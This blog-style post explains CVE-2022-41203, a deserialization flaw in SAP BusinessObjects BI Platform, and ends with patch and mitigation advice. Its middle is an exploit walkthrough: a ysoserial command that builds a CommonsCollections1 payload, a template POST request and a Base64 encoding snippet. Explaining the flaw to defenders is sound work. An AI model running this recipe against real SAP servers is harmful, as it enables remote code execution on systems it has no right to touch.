CVE-2022-41203 - How a Low-Privilege SAP BI User Could Take Over the Server with a Simple Exploit

CVE-2022-41203 is a serious deserialization vulnerability uncovered in SAP BusinessObjects Business Intelligence (BI) Platform. With a CVSS v3 base score of 9.9 (Critical), it affects the Central Management Console (CMC) and BI LaunchPad applications. This vulnerability allows low-privilege, authenticated attackers to intercept workflow parameters and replace them with malicious serialized objects, which the system then deserializes without proper validation. In plain language — it lets a simple "user" potentially take control of one of SAP’s most widely used BI tools.

This post will break down how CVE-2022-41203 works, show a code example of the exploitation, and provide original sources for more details.

What Is Deserialization — And Why Does It Matter?

Serialization is the process of converting an object into a data format you can easily transfer (like over a network). Deserialization turns that data back into an object. If you deserialize something that is not what you expected, it could run malicious code. That's how many big exploits like this happen.

Where’s the Bug?

SAP BusinessObjects BI Platform CMC and BI LaunchPad both accept serialized parameters as part of their normal workflow. These parameters are transmitted between the user's browser and the SAP server.

If an attacker can catch and modify these parameters — even as a low-privilege user — they can swap the legitimate serialized object for one that contains malicious code.

The BI software, failing to validate or sanitize that object, will deserialize and execute it, giving the attacker a direct path to compromise the system.

Attacker logs in with minimal privileges to SAP BI LaunchPad or CMC.

2. Initiates a common workflow (e.g., report generation or content management), which sends serialized data to the server.
3. Intercepts the request using a proxy tool like Burp Suite or OWASP ZAP.
4. Replaces the serialized parameter with a malicious payload — a serialized object designed for code execution (like a Java gadget chain).

Code Example: Java Deserialization Exploit

Note: This is for educational purposes only! Do not use against systems you do not have permission to test.

Most SAP BI deployments are Java-based. We'll use the ysoserial tool to generate a Java deserialization payload.

Suppose the attacker wants the server to run calc.exe (on Windows). Here’s how the payload is generated:

java -jar ysoserial.jar CommonsCollections1 "calc.exe" > payload.ser

This command creates a serialized Java object that pops the calculator when deserialized.

Now, using Burp Suite, the attacker captures a POST request with a parameter like this

POST /BOE/CMC/whatever.action HTTP/1.1
Host: sap-bi.example.com
Cookie: Session=...
Content-Type: application/x-www-form-urlencoded

objectParam=<base64-encoded-serialized-object>

The attacker replaces the value of objectParam with the Base64-encoded contents of payload.ser.

import base64
with open('payload.ser', 'rb') as f:
    content = f.read()
print(base64.b64encode(content).decode())

Paste this Base64 string into the HTTP request.

Result: When the SAP BI Platform receives this, it deserializes and executes the payload, running arbitrary code at the privileges of the Java process (often high).

SAP's Official Advisory and Patch

SAP released a patch in SAP Security Note 3243924 (NVD entry). The fix adds proper validation and limits what objects can be deserialized.

What’s vulnerable:  
- SAP BusinessObjects BI Platform (CMC, BI LaunchPad) — versions prior to SAP Note 3243924/versions prior to Patch Level 8 for version 4.3

Mitigation advice:

Works with low privilege: Attackers don't need administrator rights to exploit this flaw.

- Bypasses traditional security: Many security suites miss deserialization attacks if not specifically configured.

Never trust serialized data from users — always validate and sanitize.

- Use language/library controls to restrict what types can be deserialized.

References and Further Reading

- SAP Security Note 3243924
- NVD: CVE-2022-41203
- ysoserial: Exploiting Java Deserialization
- Deserialization Vulnerabilities Explained - OWASP

Conclusion

CVE-2022-41203 is a critical wake-up call for anyone running SAP BusinessObjects BI Platform. A single, low-privilege user could chain basic skills and free tools together to gain full control due to poor handling of serialized data. Patch now, and remember: never deserialize user-supplied objects unless you’re absolutely sure they're safe!

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 15:56:00 UTC